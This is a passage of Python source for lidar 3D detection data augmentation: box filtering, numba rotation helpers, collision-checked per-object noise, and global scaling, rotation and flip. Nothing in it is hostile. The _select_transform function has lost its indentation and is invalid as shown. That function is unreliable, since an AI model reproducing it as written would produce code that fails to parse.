            logger.info(f"{min_gt_point_dict}")

    def _preprocess(self, db_infos):
        """Mutate db_infos in place, keeping objects with enough points."""
        for name, min_num in self._min_gt_point_dict.items():
            if min_num > 0:
                db_infos[name] = [
                    info for info in db_infos[name]
                    if info["num_points_in_gt"] >= min_num
                ]
        return db_infos
class DataBasePreprocessor:
    """Compose preprocessing steps and apply them in order to db_infos."""

    def __init__(self, preprocessors):
        self._preprocessors = preprocessors

    def __call__(self, db_infos):
        for step in self._preprocessors:
            db_infos = step(db_infos)
        return db_infos
def filter_gt_box_outside_range(gt_boxes, limit_range):
    """Mask of GT boxes with at least one BEV corner inside the range.

    Should be applied after other prep functions.

    Args:
        gt_boxes: [N, 7+] boxes; columns 0-1 are x/y center, 3-4 the BEV
            size, and the last column the yaw (per the indexing below).
        limit_range: min/max BEV range, presumably
            [xmin, ymin, xmax, ymax] — confirm against minmax_to_corner_2d.

    Returns:
        Boolean mask of shape [N]: True where any of the 4 BEV corners
        lies inside the range polygon.
    """
    gt_boxes_bv = box_np_ops.center_to_corner_box2d(
        gt_boxes[:, [0, 1]], gt_boxes[:, [3, 3 + 1]], gt_boxes[:, -1]
    )
    bounding_box = box_np_ops.minmax_to_corner_2d(
        np.asarray(limit_range)[np.newaxis, ...]
    )
    ret = points_in_convex_polygon_jit(gt_boxes_bv.reshape(-1, 2), bounding_box)
    # One row per corner; a box survives if any of its 4 corners is inside.
    return np.any(ret.reshape(-1, 4), axis=1)
def filter_gt_box_outside_range_by_center(gt_boxes, limit_range):
    """Mask of GT boxes whose BEV *center* lies inside the range.

    Stricter sibling of filter_gt_box_outside_range: tests only the
    center (columns 0-1), not the corners. Apply after other prep
    functions.

    Args:
        gt_boxes: [N, 7+] boxes; columns 0-1 are the x/y center.
        limit_range: min/max BEV range passed to minmax_to_corner_2d.

    Returns:
        Boolean mask of shape [N].
    """
    gt_box_centers = gt_boxes[:, :2]
    bounding_box = box_np_ops.minmax_to_corner_2d(
        np.asarray(limit_range)[np.newaxis, ...]
    )
    ret = points_in_convex_polygon_jit(gt_box_centers, bounding_box)
    return ret.reshape(-1)
def filter_gt_low_points(gt_boxes, points, num_gt_points, point_num_threshold=2):
    """Drop GT boxes containing <= point_num_threshold points, along with
    the points inside those boxes.

    Args:
        gt_boxes: [N, 7+] boxes.
        points: [M, D] point cloud (first 3 columns are xyz).
        num_gt_points: per-box point counts, aligned with gt_boxes.
        point_num_threshold: boxes at or below this count are removed.

    Returns:
        (filtered gt_boxes, filtered points).
    """
    # FIX: np.bool was deprecated in NumPy 1.20 and removed in 1.24; the
    # builtin bool dtype is the supported spelling.
    points_mask = np.ones([points.shape[0]], bool)
    gt_boxes_mask = np.ones([gt_boxes.shape[0]], bool)
    for i, num in enumerate(num_gt_points):
        if num <= point_num_threshold:
            masks = box_np_ops.points_in_rbbox(points, gt_boxes[i : i + 1])
            masks = masks.reshape([-1])
            # Remove points inside the under-populated box too.
            points_mask &= np.logical_not(masks)
            gt_boxes_mask[i] = False
    return gt_boxes[gt_boxes_mask], points[points_mask]
def mask_points_in_corners(points, box_corners):
    """Boolean mask of which points fall inside which corner-form 3D boxes.

    Converts corners to surfaces, then runs the convex-polygon test on
    xyz (points[:, :3]). Result shape is presumably
    [num_points, num_boxes] — confirm against
    points_in_convex_polygon_3d_jit.
    """
    surfaces = box_np_ops.corner_to_surfaces_3d(box_corners)
    mask = points_in_convex_polygon_3d_jit(points[:, :3], surfaces)
    return mask
@numba.njit
def _rotation_matrix_3d_(rot_mat_T, angle, axis):
    """Fill rot_mat_T in place with the transposed 3D rotation matrix for
    `angle` about `axis` (0 = x, 1 = y, 2 or -1 = z).

    Any other axis value leaves the identity written by np.eye(3).
    """
    rot_sin = np.sin(angle)
    rot_cos = np.cos(angle)
    rot_mat_T[:] = np.eye(3)
    if axis == 1:
        rot_mat_T[0, 0] = rot_cos
        rot_mat_T[0, 2] = -rot_sin
        rot_mat_T[2, 0] = rot_sin
        rot_mat_T[2, 2] = rot_cos
    elif axis == 2 or axis == -1:
        rot_mat_T[0, 0] = rot_cos
        rot_mat_T[0, 1] = -rot_sin
        rot_mat_T[1, 0] = rot_sin
        rot_mat_T[1, 1] = rot_cos
    elif axis == 0:
        rot_mat_T[1, 1] = rot_cos
        rot_mat_T[1, 2] = -rot_sin
        rot_mat_T[2, 1] = rot_sin
        rot_mat_T[2, 2] = rot_cos
@numba.njit
def _rotation_box2d_jit_(corners, angle, rot_mat_T):
    """Rotate 2D `corners` in place by `angle`.

    rot_mat_T is caller-provided (2, 2) scratch space, overwritten here
    with the transposed rotation matrix before the multiply.
    """
    rot_sin = np.sin(angle)
    rot_cos = np.cos(angle)
    rot_mat_T[0, 0] = rot_cos
    rot_mat_T[0, 1] = -rot_sin
    rot_mat_T[1, 0] = rot_sin
    rot_mat_T[1, 1] = rot_cos
    corners[:] = corners @ rot_mat_T
@numba.jit(nopython=True)
def _box_single_to_corner_jit(boxes):
    """Convert [N, 5] 2D boxes (center xy at cols 0-1, size at cols 2-3,
    angle in the last col) to [N, 4, 2] corner coordinates.
    """
    num_box = boxes.shape[0]
    # Unit square corners, shifted so the box center is the origin.
    corners_norm = np.zeros((4, 2), dtype=boxes.dtype)
    corners_norm[1, 1] = 1.0
    corners_norm[2] = 1.0
    corners_norm[3, 0] = 1.0
    corners_norm -= np.array([0.5, 0.5], dtype=boxes.dtype)
    # Scale the unit corners by each box's size.
    corners = boxes.reshape(num_box, 1, 5)[:, :, 2:4] * corners_norm.reshape(1, 4, 2)
    rot_mat_T = np.zeros((2, 2), dtype=boxes.dtype)
    box_corners = np.zeros((num_box, 4, 2), dtype=boxes.dtype)
    for i in range(num_box):
        # Rotate by the box angle, then translate to the box center.
        rot_sin = np.sin(boxes[i, -1])
        rot_cos = np.cos(boxes[i, -1])
        rot_mat_T[0, 0] = rot_cos
        rot_mat_T[0, 1] = -rot_sin
        rot_mat_T[1, 0] = rot_sin
        rot_mat_T[1, 1] = rot_cos
        box_corners[i] = corners[i] @ rot_mat_T + boxes[i, :2]
    return box_corners
@numba.njit
def noise_per_box(boxes, valid_mask, loc_noises, rot_noises):
    """For each valid box, try the M candidate (loc, rot) perturbations in
    order and accept the first whose perturbed corners collide with no
    other box. Returns, per box, the accepted candidate index or -1.

    box_corners is updated in place as candidates are accepted, so later
    boxes are collision-tested against already-moved ones.
    """
    # boxes: [N, 5]
    # valid_mask: [N]
    # loc_noises: [N, M, 3]
    # rot_noises: [N, M]
    num_boxes = boxes.shape[0]
    num_tests = loc_noises.shape[1]
    box_corners = box_np_ops.box2d_to_corner_jit(boxes)
    current_corners = np.zeros((4, 2), dtype=boxes.dtype)
    rot_mat_T = np.zeros((2, 2), dtype=boxes.dtype)
    success_mask = -np.ones((num_boxes,), dtype=np.int64)
    for i in range(num_boxes):
        if valid_mask[i]:
            for j in range(num_tests):
                # Rotate about the box center, then translate by the noise.
                current_corners[:] = box_corners[i]
                current_corners -= boxes[i, :2]
                _rotation_box2d_jit_(current_corners, rot_noises[i, j], rot_mat_T)
                current_corners += boxes[i, :2] + loc_noises[i, j, :2]
                coll_mat = box_collision_test(
                    current_corners.reshape(1, 4, 2), box_corners
                )
                coll_mat[0, i] = False  # ignore self-collision
                if not coll_mat.any():
                    success_mask[i] = j
                    box_corners[i] = current_corners
                    break
    return success_mask
@numba.njit
def noise_per_box_group(boxes, valid_mask, loc_noises, rot_noises, group_nums):
    """Group-wise variant of noise_per_box: all members of a group are
    perturbed together, and candidate j is accepted only if no member
    collides with any box outside the group. Returns the accepted
    candidate index per box, or -1.
    """
    # WARNING: this function need boxes to be sorted by group id.
    # boxes: [N, 5]
    # valid_mask: [N]
    # loc_noises: [N, M, 3]
    # rot_noises: [N, M]
    num_groups = group_nums.shape[0]  # NOTE(review): unused
    num_boxes = boxes.shape[0]
    num_tests = loc_noises.shape[1]
    box_corners = box_np_ops.box2d_to_corner_jit(boxes)
    max_group_num = group_nums.max()
    current_corners = np.zeros((max_group_num, 4, 2), dtype=boxes.dtype)
    rot_mat_T = np.zeros((2, 2), dtype=boxes.dtype)
    success_mask = -np.ones((num_boxes,), dtype=np.int64)
    idx = 0  # index of the first box of the current group
    for num in group_nums:
        # Validity of the group is judged by its first member only.
        if valid_mask[idx]:
            for j in range(num_tests):
                for i in range(num):
                    current_corners[i] = box_corners[i + idx]
                    current_corners[i] -= boxes[i + idx, :2]
                    _rotation_box2d_jit_(
                        current_corners[i], rot_noises[idx + i, j], rot_mat_T
                    )
                    current_corners[i] += (
                        boxes[i + idx, :2] + loc_noises[i + idx, j, :2]
                    )
                coll_mat = box_collision_test(
                    current_corners[:num].reshape(num, 4, 2), box_corners
                )
                for i in range(num):  # remove self-coll
                    coll_mat[i, idx : idx + num] = False
                if not coll_mat.any():
                    for i in range(num):
                        success_mask[i + idx] = j
                        box_corners[i + idx] = current_corners[i]
                    break
        idx += num
    return success_mask
@numba.njit
def noise_per_box_group_v2_(
    boxes, valid_mask, loc_noises, rot_noises, group_nums, global_rot_noises
):
    """Like noise_per_box_group, but each member is additionally rotated
    about the origin (its center moves along the circle of constant
    radius, and its yaw is adjusted accordingly). On success the loc/rot
    noise arrays are updated in place so they record the total accepted
    displacement/rotation.
    """
    # WARNING: this function need boxes to be sorted by group id.
    # boxes: [N, 5]
    # valid_mask: [N]
    # loc_noises: [N, M, 3]
    # rot_noises: [N, M]
    num_boxes = boxes.shape[0]
    num_tests = loc_noises.shape[1]
    box_corners = box_np_ops.box2d_to_corner_jit(boxes)
    max_group_num = group_nums.max()
    current_box = np.zeros((1, 5), dtype=boxes.dtype)
    current_corners = np.zeros((max_group_num, 4, 2), dtype=boxes.dtype)
    dst_pos = np.zeros((max_group_num, 2), dtype=boxes.dtype)
    current_grot = np.zeros((max_group_num,), dtype=boxes.dtype)
    dst_grot = np.zeros((max_group_num,), dtype=boxes.dtype)
    rot_mat_T = np.zeros((2, 2), dtype=boxes.dtype)
    success_mask = -np.ones((num_boxes,), dtype=np.int64)
    # Unit-square corner template centered on the origin.
    corners_norm = np.zeros((4, 2), dtype=boxes.dtype)
    corners_norm[1, 1] = 1.0
    corners_norm[2] = 1.0
    corners_norm[3, 0] = 1.0
    corners_norm -= np.array([0.5, 0.5], dtype=boxes.dtype)
    corners_norm = corners_norm.reshape(4, 2)
    idx = 0  # index of the first box of the current group
    for num in group_nums:
        if valid_mask[idx]:
            for j in range(num_tests):
                for i in range(num):
                    current_box[0, :] = boxes[i + idx]
                    # Global rotation: move the center along its circle
                    # around the origin by global_rot_noises[idx+i, j].
                    current_radius = np.sqrt(
                        current_box[0, 0] ** 2 + current_box[0, 1] ** 2
                    )
                    current_grot[i] = np.arctan2(current_box[0, 0], current_box[0, 1])
                    dst_grot[i] = current_grot[i] + global_rot_noises[idx + i, j]
                    dst_pos[i, 0] = current_radius * np.sin(dst_grot[i])
                    dst_pos[i, 1] = current_radius * np.cos(dst_grot[i])
                    current_box[0, :2] = dst_pos[i]
                    current_box[0, -1] += dst_grot[i] - current_grot[i]
                    # Rebuild the corners at the rotated pose.
                    rot_sin = np.sin(current_box[0, -1])
                    rot_cos = np.cos(current_box[0, -1])
                    rot_mat_T[0, 0] = rot_cos
                    rot_mat_T[0, 1] = -rot_sin
                    rot_mat_T[1, 0] = rot_sin
                    rot_mat_T[1, 1] = rot_cos
                    current_corners[i] = (
                        current_box[0, 2:4] * corners_norm @ rot_mat_T
                        + current_box[0, :2]
                    )
                    # Per-box local rotation + translation noise on top.
                    current_corners[i] -= current_box[0, :2]
                    _rotation_box2d_jit_(
                        current_corners[i], rot_noises[idx + i, j], rot_mat_T
                    )
                    current_corners[i] += (
                        current_box[0, :2] + loc_noises[i + idx, j, :2]
                    )
                coll_mat = box_collision_test(
                    current_corners[:num].reshape(num, 4, 2), box_corners
                )
                for i in range(num):  # remove self-coll
                    coll_mat[i, idx : idx + num] = False
                if not coll_mat.any():
                    for i in range(num):
                        success_mask[i + idx] = j
                        box_corners[i + idx] = current_corners[i]
                        # Fold the global-rotation displacement into the
                        # noise arrays so callers can replay it.
                        loc_noises[i + idx, j, :2] += dst_pos[i] - boxes[i + idx, :2]
                        rot_noises[i + idx, j] += dst_grot[i] - current_grot[i]
                    break
        idx += num
    return success_mask
@numba.njit
def noise_per_box_v2_(boxes, valid_mask, loc_noises, rot_noises, global_rot_noises):
    """Single-box variant of noise_per_box_group_v2_: applies a global
    rotation about the origin plus per-box local (loc, rot) noise, and
    accepts the first collision-free candidate per box. On success the
    noise arrays are updated in place to record the total displacement.
    Returns the accepted candidate index per box, or -1.
    """
    # boxes: [N, 5]
    # valid_mask: [N]
    # loc_noises: [N, M, 3]
    # rot_noises: [N, M]
    num_boxes = boxes.shape[0]
    num_tests = loc_noises.shape[1]
    box_corners = box_np_ops.box2d_to_corner_jit(boxes)
    current_corners = np.zeros((4, 2), dtype=boxes.dtype)
    current_box = np.zeros((1, 5), dtype=boxes.dtype)
    rot_mat_T = np.zeros((2, 2), dtype=boxes.dtype)
    dst_pos = np.zeros((2,), dtype=boxes.dtype)
    success_mask = -np.ones((num_boxes,), dtype=np.int64)
    # Unit-square corner template centered on the origin.
    corners_norm = np.zeros((4, 2), dtype=boxes.dtype)
    corners_norm[1, 1] = 1.0
    corners_norm[2] = 1.0
    corners_norm[3, 0] = 1.0
    corners_norm -= np.array([0.5, 0.5], dtype=boxes.dtype)
    corners_norm = corners_norm.reshape(4, 2)
    for i in range(num_boxes):
        if valid_mask[i]:
            for j in range(num_tests):
                current_box[0, :] = boxes[i]
                # Move the center along its circle around the origin.
                current_radius = np.sqrt(boxes[i, 0] ** 2 + boxes[i, 1] ** 2)
                current_grot = np.arctan2(boxes[i, 0], boxes[i, 1])
                dst_grot = current_grot + global_rot_noises[i, j]
                dst_pos[0] = current_radius * np.sin(dst_grot)
                dst_pos[1] = current_radius * np.cos(dst_grot)
                current_box[0, :2] = dst_pos
                current_box[0, -1] += dst_grot - current_grot
                # Rebuild corners at the rotated pose.
                rot_sin = np.sin(current_box[0, -1])
                rot_cos = np.cos(current_box[0, -1])
                rot_mat_T[0, 0] = rot_cos
                rot_mat_T[0, 1] = -rot_sin
                rot_mat_T[1, 0] = rot_sin
                rot_mat_T[1, 1] = rot_cos
                current_corners[:] = (
                    current_box[0, 2:4] * corners_norm @ rot_mat_T + current_box[0, :2]
                )
                # Apply the local per-box noise on top.
                current_corners -= current_box[0, :2]
                _rotation_box2d_jit_(current_corners, rot_noises[i, j], rot_mat_T)
                current_corners += current_box[0, :2] + loc_noises[i, j, :2]
                coll_mat = box_collision_test(
                    current_corners.reshape(1, 4, 2), box_corners
                )
                coll_mat[0, i] = False  # ignore self-collision
                if not coll_mat.any():
                    success_mask[i] = j
                    box_corners[i] = current_corners
                    # Fold the global-rotation displacement into the noise.
                    loc_noises[i, j, :2] += dst_pos - boxes[i, :2]
                    rot_noises[i, j] += dst_grot - current_grot
                    break
    return success_mask
@numba.njit
def points_transform_(
    points, centers, point_masks, loc_transform, rot_transform, valid_mask
):
    """Apply, in place, each valid box's (translation, z-rotation) to the
    points it contains (point_masks[i, j] == 1). A point inside several
    boxes takes only the first matching box's transform.
    """
    num_box = centers.shape[0]
    num_points = points.shape[0]
    # Pre-build one transposed z-rotation matrix per box.
    rot_mat_T = np.zeros((num_box, 3, 3), dtype=points.dtype)
    for i in range(num_box):
        _rotation_matrix_3d_(rot_mat_T[i], rot_transform[i], 2)
    for i in range(num_points):
        for j in range(num_box):
            if valid_mask[j]:
                if point_masks[i, j] == 1:
                    # Rotate about the box center, then translate.
                    points[i, :3] -= centers[j, :3]
                    points[i : i + 1, :3] = points[i : i + 1, :3] @ rot_mat_T[j]
                    points[i, :3] += centers[j, :3]
                    points[i, :3] += loc_transform[j]
                    break  # only apply first box's transform
@numba.njit
def box3d_transform_(boxes, loc_transform, rot_transform, valid_mask):
    """In place: add loc_transform to the box centers (cols 0-2) and
    rot_transform to the yaw (col 6) of every valid box.
    """
    num_box = boxes.shape[0]
    for i in range(num_box):
        if valid_mask[i]:
            boxes[i, :3] += loc_transform[i]
            boxes[i, 6] += rot_transform[i]
def _select_transform(transform, indices):
result = np.zeros((transform.shape[0], *transform.shape[2:]), dtype=transform.dtype)
for i in range(transform.shape[0]):
if indices[i] != -1:
result[i] = transform[i, indices[i]]
return result
@numba.njit
def group_transform_(loc_noise, rot_noise, locs, rots, group_center, valid_mask):
    """Adjust loc_noise in place so each member rotates rigidly about its
    group center: the chord displacement of the member's offset (radius
    r, base angle rot_center) under rot_noise is added to its candidate
    translations. NOTE(review): `rots` is accepted but never used.
    """
    # loc_noise: [N, M, 3], locs: [N, 3]
    # rot_noise: [N, M]
    # group_center: [N, 3]
    num_try = loc_noise.shape[1]
    r = 0.0
    x = 0.0
    y = 0.0
    rot_center = 0.0
    for i in range(loc_noise.shape[0]):
        if valid_mask[i]:
            x = locs[i, 0] - group_center[i, 0]
            y = locs[i, 1] - group_center[i, 1]
            r = np.sqrt(x ** 2 + y ** 2)
            # calculate rots related to group center
            rot_center = np.arctan2(x, y)
            for j in range(num_try):
                loc_noise[i, j, 0] += r * (
                    np.sin(rot_center + rot_noise[i, j]) - np.sin(rot_center)
                )
                loc_noise[i, j, 1] += r * (
                    np.cos(rot_center + rot_noise[i, j]) - np.cos(rot_center)
                )
@numba.njit
def group_transform_v2_(
    loc_noise, rot_noise, locs, rots, group_center, grot_noise, valid_mask
):
    """Like group_transform_, but the member's base angle is first shifted
    by the candidate global rotation grot_noise[i, j] before the chord
    displacement is computed. NOTE(review): `rots` is never used.
    """
    # loc_noise: [N, M, 3], locs: [N, 3]
    # rot_noise: [N, M]
    # group_center: [N, 3]
    num_try = loc_noise.shape[1]
    r = 0.0
    x = 0.0
    y = 0.0
    rot_center = 0.0
    for i in range(loc_noise.shape[0]):
        if valid_mask[i]:
            x = locs[i, 0] - group_center[i, 0]
            y = locs[i, 1] - group_center[i, 1]
            r = np.sqrt(x ** 2 + y ** 2)
            # calculate rots related to group center
            rot_center = np.arctan2(x, y)
            for j in range(num_try):
                loc_noise[i, j, 0] += r * (
                    np.sin(rot_center + rot_noise[i, j] + grot_noise[i, j])
                    - np.sin(rot_center + grot_noise[i, j])
                )
                loc_noise[i, j, 1] += r * (
                    np.cos(rot_center + rot_noise[i, j] + grot_noise[i, j])
                    - np.cos(rot_center + grot_noise[i, j])
                )
def set_group_noise_same_(loc_noise, rot_noise, group_ids):
    """Copy each group's first-member noise rows to every member (in place),
    so all boxes of a group share identical candidate noise.
    """
    first_index = {}
    for idx, gid in enumerate(group_ids):
        first_index.setdefault(gid, idx)
    for idx, gid in enumerate(group_ids):
        src = first_index[gid]
        loc_noise[idx] = loc_noise[src]
        rot_noise[idx] = rot_noise[src]
def set_group_noise_same_v2_(loc_noise, rot_noise, grot_noise, group_ids):
    """Copy each group's first-member noise rows (including global
    rotation noise) to every member, in place.
    """
    first_index = {}
    for idx, gid in enumerate(group_ids):
        first_index.setdefault(gid, idx)
    for idx, gid in enumerate(group_ids):
        src = first_index[gid]
        loc_noise[idx] = loc_noise[src]
        rot_noise[idx] = rot_noise[src]
        grot_noise[idx] = grot_noise[src]
def get_group_center(locs, group_ids):
    """Mean location of each group, broadcast back to every member.

    Returns (centers, counts): centers[i] is the centroid of member i's
    group; counts is an OrderedDict mapping group id -> group size in
    first-seen order.

    NOTE(review): a negative gid is skipped in the accumulation pass but
    still looked up in the broadcast pass, which would raise KeyError —
    callers appear to pass only non-negative ids.
    """
    sums = np.zeros_like(locs)
    slot_of = {}
    counts = OrderedDict()
    for member, gid in enumerate(group_ids):
        if gid < 0:
            continue
        if gid not in slot_of:
            slot_of[gid] = len(slot_of)
            counts[gid] = 0
        sums[slot_of[gid]] += locs[member]
        counts[gid] += 1
    centers = np.zeros_like(locs)
    for member, gid in enumerate(group_ids):
        centers[member] = sums[slot_of[gid]] / counts[gid]
    return centers, counts
def noise_per_object_v3_(
    gt_boxes,
    points=None,
    valid_mask=None,
    rotation_perturb=np.pi / 4,
    center_noise_std=1.0,
    global_random_rot_range=np.pi / 4,
    num_try=5,
    group_ids=None,
):
    """Randomly rotate/translate each ground-truth box independently, in place.

    For every box, ``num_try`` candidate perturbations are sampled; a
    collision-free candidate is then applied to the box and to the points
    falling inside it. (Use the kitti viewer to inspect the result.)

    Args:
        gt_boxes: [N, 7], gt box in lidar; modified in place.
        points: [M, 4], point cloud in lidar; transformed together with boxes.
        valid_mask: optional [N] bool mask of boxes that may be perturbed.
        rotation_perturb: scalar r (meaning [-r, r]) or [low, high] range of
            per-box yaw noise.
        center_noise_std: scalar or per-axis [x, y, z] translation noise std.
        global_random_rot_range: scalar or [low, high]; a non-degenerate
            range additionally enables global-rotation-style noise.
        num_try: number of candidate perturbations sampled per box.
        group_ids: optional per-box group ids; grouped boxes move rigidly.
    """
    num_boxes = gt_boxes.shape[0]
    # Normalize scalar noise specs to [low, high] / per-axis form.
    if not isinstance(rotation_perturb, (list, tuple, np.ndarray)):
        rotation_perturb = [-rotation_perturb, rotation_perturb]
    if not isinstance(global_random_rot_range, (list, tuple, np.ndarray)):
        global_random_rot_range = [-global_random_rot_range, global_random_rot_range]
    enable_grot = (
        np.abs(global_random_rot_range[0] - global_random_rot_range[1]) >= 1e-3
    )
    if not isinstance(center_noise_std, (list, tuple, np.ndarray)):
        center_noise_std = [center_noise_std, center_noise_std, center_noise_std]
    if valid_mask is None:
        valid_mask = np.ones((num_boxes,), dtype=np.bool_)
    center_noise_std = np.array(center_noise_std, dtype=gt_boxes.dtype)
    # Draw num_try candidate translations / rotations per box.
    loc_noises = np.random.normal(scale=center_noise_std, size=[num_boxes, num_try, 3])
    # loc_noises = np.random.uniform(
    #     -center_noise_std, center_noise_std, size=[num_boxes, num_try, 3])
    rot_noises = np.random.uniform(
        rotation_perturb[0], rotation_perturb[1], size=[num_boxes, num_try]
    )
    # Global-rotation noise is sampled relative to each box's bearing angle.
    gt_grots = np.arctan2(gt_boxes[:, 0], gt_boxes[:, 1])
    grot_lowers = global_random_rot_range[0] - gt_grots
    grot_uppers = global_random_rot_range[1] - gt_grots
    global_rot_noises = np.random.uniform(
        grot_lowers[..., np.newaxis],
        grot_uppers[..., np.newaxis],
        size=[num_boxes, num_try],
    )
    if group_ids is not None:
        # Boxes sharing a group id receive identical noise so the whole
        # group moves rigidly around its common center.
        if enable_grot:
            set_group_noise_same_v2_(
                loc_noises, rot_noises, global_rot_noises, group_ids
            )
        else:
            set_group_noise_same_(loc_noises, rot_noises, group_ids)
        group_centers, group_id_num_dict = get_group_center(gt_boxes[:, :3], group_ids)
        if enable_grot:
            group_transform_v2_(
                loc_noises,
                rot_noises,
                gt_boxes[:, :3],
                gt_boxes[:, 6],
                group_centers,
                global_rot_noises,
                valid_mask,
            )
        else:
            group_transform_(
                loc_noises,
                rot_noises,
                gt_boxes[:, :3],
                gt_boxes[:, 6],
                group_centers,
                valid_mask,
            )
        group_nums = np.array(list(group_id_num_dict.values()), dtype=np.int64)
    origin = [0.5, 0.5, 0.5]
    gt_box_corners = box_np_ops.center_to_corner_box3d(
        gt_boxes[:, :3], gt_boxes[:, 3:6], gt_boxes[:, 6], origin=origin, axis=2
    )
    # Pick, per box, the first candidate noise that keeps boxes collision
    # free; the selection works on the BEV footprint (x, y, w, l, yaw).
    if group_ids is not None:
        if not enable_grot:
            selected_noise = noise_per_box_group(
                gt_boxes[:, [0, 1, 3, 4, 6]],
                valid_mask,
                loc_noises,
                rot_noises,
                group_nums,
            )
        else:
            selected_noise = noise_per_box_group_v2_(
                gt_boxes[:, [0, 1, 3, 4, 6]],
                valid_mask,
                loc_noises,
                rot_noises,
                group_nums,
                global_rot_noises,
            )
    else:
        if not enable_grot:
            selected_noise = noise_per_box(
                gt_boxes[:, [0, 1, 3, 4, 6]], valid_mask, loc_noises, rot_noises
            )
        else:
            selected_noise = noise_per_box_v2_(
                gt_boxes[:, [0, 1, 3, 4, 6]],
                valid_mask,
                loc_noises,
                rot_noises,
                global_rot_noises,
            )
    loc_transforms = _select_transform(loc_noises, selected_noise)
    rot_transforms = _select_transform(rot_noises, selected_noise)
    surfaces = box_np_ops.corner_to_surfaces_3d_jit(gt_box_corners)
    if points is not None:
        # Move the points belonging to each box together with the box.
        point_masks = points_in_convex_polygon_3d_jit(points[:, :3], surfaces)
        points_transform_(
            points,
            gt_boxes[:, :3],
            point_masks,
            loc_transforms,
            rot_transforms,
            valid_mask,
        )
    box3d_transform_(gt_boxes, loc_transforms, rot_transforms, valid_mask)
def noise_per_object_v2_(
    gt_boxes,
    points=None,
    valid_mask=None,
    rotation_perturb=np.pi / 4,
    center_noise_std=1.0,
    global_random_rot_range=np.pi / 4,
    num_try=100,
):
    """Randomly rotate/translate each ground-truth box independently, in place.

    Earlier variant of ``noise_per_object_v3_`` without group support.
    (Use the kitti viewer to inspect the result.)

    Args:
        gt_boxes: [N, 7], gt box in lidar; modified in place.
        points: [M, 4], point cloud in lidar; transformed together with boxes.
        valid_mask: optional [N] bool mask of boxes that may be perturbed.
        rotation_perturb: scalar r (meaning [-r, r]) or [low, high] range.
        center_noise_std: scalar or per-axis [x, y, z] translation noise std.
        global_random_rot_range: scalar or [low, high]; a non-degenerate
            range enables the global-rotation noise path.
        num_try: number of candidate perturbations sampled per box.
    """
    num_boxes = gt_boxes.shape[0]
    # Normalize scalar noise specs to [low, high] / per-axis form.
    if not isinstance(rotation_perturb, (list, tuple, np.ndarray)):
        rotation_perturb = [-rotation_perturb, rotation_perturb]
    if not isinstance(global_random_rot_range, (list, tuple, np.ndarray)):
        global_random_rot_range = [-global_random_rot_range, global_random_rot_range]
    if not isinstance(center_noise_std, (list, tuple, np.ndarray)):
        center_noise_std = [center_noise_std, center_noise_std, center_noise_std]
    if valid_mask is None:
        valid_mask = np.ones((num_boxes,), dtype=np.bool_)
    center_noise_std = np.array(center_noise_std, dtype=gt_boxes.dtype)
    # Draw num_try candidate translations / rotations per box.
    loc_noises = np.random.normal(scale=center_noise_std, size=[num_boxes, num_try, 3])
    # loc_noises = np.random.uniform(
    #     -center_noise_std, center_noise_std, size=[num_boxes, num_try, 3])
    rot_noises = np.random.uniform(
        rotation_perturb[0], rotation_perturb[1], size=[num_boxes, num_try]
    )
    # Global-rotation noise is sampled relative to each box's bearing angle.
    gt_grots = np.arctan2(gt_boxes[:, 0], gt_boxes[:, 1])
    grot_lowers = global_random_rot_range[0] - gt_grots
    grot_uppers = global_random_rot_range[1] - gt_grots
    global_rot_noises = np.random.uniform(
        grot_lowers[..., np.newaxis],
        grot_uppers[..., np.newaxis],
        size=[num_boxes, num_try],
    )
    # NOTE(review): v2 uses a z-origin of 0 (box bottom) here, while v3 uses
    # 0.5 — confirm which convention the surrounding pipeline expects.
    origin = [0.5, 0.5, 0]
    gt_box_corners = box_np_ops.center_to_corner_box3d(
        gt_boxes[:, :3], gt_boxes[:, 3:6], gt_boxes[:, 6], origin=origin, axis=2
    )
    # A degenerate global-rotation range disables the global-rotation path.
    if np.abs(global_random_rot_range[0] - global_random_rot_range[1]) < 1e-3:
        selected_noise = noise_per_box(
            gt_boxes[:, [0, 1, 3, 4, 6]], valid_mask, loc_noises, rot_noises
        )
    else:
        selected_noise = noise_per_box_v2_(
            gt_boxes[:, [0, 1, 3, 4, 6]],
            valid_mask,
            loc_noises,
            rot_noises,
            global_rot_noises,
        )
    loc_transforms = _select_transform(loc_noises, selected_noise)
    rot_transforms = _select_transform(rot_noises, selected_noise)
    if points is not None:
        # Move the points belonging to each box together with the box.
        surfaces = box_np_ops.corner_to_surfaces_3d_jit(gt_box_corners)
        point_masks = points_in_convex_polygon_3d_jit(points[:, :3], surfaces)
        points_transform_(
            points,
            gt_boxes[:, :3],
            point_masks,
            loc_transforms,
            rot_transforms,
            valid_mask,
        )
    box3d_transform_(gt_boxes, loc_transforms, rot_transforms, valid_mask)
def global_scaling(gt_boxes, points, scale=0.05):
    """Apply one random scale factor to the whole scene (in place).

    A factor is drawn uniformly from [1 + scale[0], 1 + scale[1]]; a scalar
    ``scale`` means the symmetric range [-scale, scale]. The factor scales
    point coordinates and box centers/sizes; box yaw is left untouched.
    """
    low, high = scale if isinstance(scale, list) else [-scale, scale]
    factor = np.random.uniform(low + 1, high + 1)
    points[:, :3] *= factor
    gt_boxes[:, :6] *= factor
    return gt_boxes, points
def global_rotation(gt_boxes, points, rotation=np.pi / 4):
    """Rotate the whole scene around the z axis by one random angle (in place).

    ``rotation`` may be a scalar r (meaning the range [-r, r]) or an explicit
    [low, high] list. Point and box centers are rotated, box yaw is shifted
    by the same angle, and for boxes wider than 7 columns the velocity
    columns 6:8 are rotated as 2-D vectors.
    """
    if not isinstance(rotation, list):
        rotation = [-rotation, rotation]
    angle = np.random.uniform(rotation[0], rotation[1])
    for arr in (points, gt_boxes):
        arr[:, :3] = box_np_ops.rotation_points_single_angle(
            arr[:, :3], angle, axis=2
        )
    if gt_boxes.shape[1] > 7:
        # Rotate (vx, vy): pad a zero z component so the 3-D helper applies.
        padded = np.hstack([gt_boxes[:, 6:8], np.zeros((gt_boxes.shape[0], 1))])
        gt_boxes[:, 6:8] = box_np_ops.rotation_points_single_angle(
            padded,
            angle,
            axis=2,
        )[:, :2]
    gt_boxes[:, -1] += angle
    return gt_boxes, points
def random_flip(gt_boxes, points, probability=0.5):
    """Mirror the scene across the x axis (y -> -y) with given probability.

    On a flip, point/box y coordinates are negated, box yaw is reflected
    (r -> pi - r), and the y velocity is negated when boxes carry
    velocities. Operates in place.
    """
    flip = np.random.choice(
        [False, True], replace=False, p=[1 - probability, probability]
    )
    if flip:
        points[:, 1] = -points[:, 1]
        gt_boxes[:, 1] = -gt_boxes[:, 1]
        gt_boxes[:, -1] = -gt_boxes[:, -1] + np.pi
